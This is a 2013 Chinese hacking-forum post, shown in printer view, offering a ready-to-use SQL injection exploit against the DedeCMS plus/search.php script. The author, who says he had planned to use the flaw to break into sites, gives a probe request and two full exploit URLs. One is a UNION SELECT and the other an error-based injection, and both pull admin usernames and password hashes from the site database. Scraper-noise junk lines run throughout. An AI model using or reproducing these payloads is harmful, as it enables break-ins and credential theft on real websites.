中国网络渗透测试联盟
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
[打印本页]
作者:
admin
时间:
2013-1-21 08:45
标题:
[通杀]dedecms plus/search.php 注入漏洞利用EXP
转载不加作者名的没JJ
3 G5 z( Z7 X8 \1 P: W" p( Z; @$ j
. H8 Z% \* o3 C5 t- @* ?* Q
哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
1 ?2 J, N# e+ z+ `6 N* `. B B+ w
% d# S5 q7 G0 d4 L( p0 P: ]3 G
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
: t* \8 s1 Y5 a1 F% x) a! k; Z. j
( _ ?1 w3 Y4 x# Q
我一般是这样测试的:
T- O- t/ [ D n" P! F( V2 F0 ]
! t1 K2 ^1 ~- l: C' V
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
+ [! z5 Y$ ^- C3 s, c+ Y
- e& e4 p+ s) q7 a, l. u. M* d
转载不加作者名的没JJ
/ b$ e" O$ D! y2 H+ h( S
9 M! X3 m& J& }) `
作者:鬼哥
+ t- c% u) v- p, ^- C( C" H3 D
+ A, |5 f$ e/ C8 Y+ w& O- v8 C$ {
# u( V3 T2 u% S+ ]' v: B: I- \. q
{) X$ e4 U! {3 B) v
看结果如果提示
- B4 S3 z& W' ]" d: @
9 _( Y/ O( a8 C4 I _
Safe Alert: Request Error step 2 !
3 B0 e/ o( c, j3 q3 @$ E: }
) T" g2 C% V, x, ?: G1 [
那么直接用下面的exp
2 v, C3 L& R( w% f
5 I) @$ G. r4 `, D; D7 R
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a
9 z- A. `* y7 b' G' W) W% d+ B
3 b5 w, m* w" e0 N* T; u, w
4 _, i' ?& l9 f- l& [
看结果如果提示
- T9 O) ?. y4 f; s' e$ Z
, y6 A; ] w# A- {& D7 N1 q2 ?! ?
Safe Alert: Request Error step 1 !
$ H. ^3 j7 ]) F% ?5 `
& l i) c: [# i% B+ e. r
那么直接用下面的exp
6 Z3 C. k: s5 \3 \* [! u
' {' q# S2 Q0 b0 E3 ^
xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a
; z4 s4 @3 f, Q0 n- E
. J. }9 d( D6 K* K+ Z9 @- ?
* o" a. w8 F0 s1 ^! Z4 j, p/ X
如果正常显示证明漏洞不存在了。
, @/ L/ I" R9 C- X0 e
1 r2 F! B4 G* R
转载不加作者名的没JJ
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2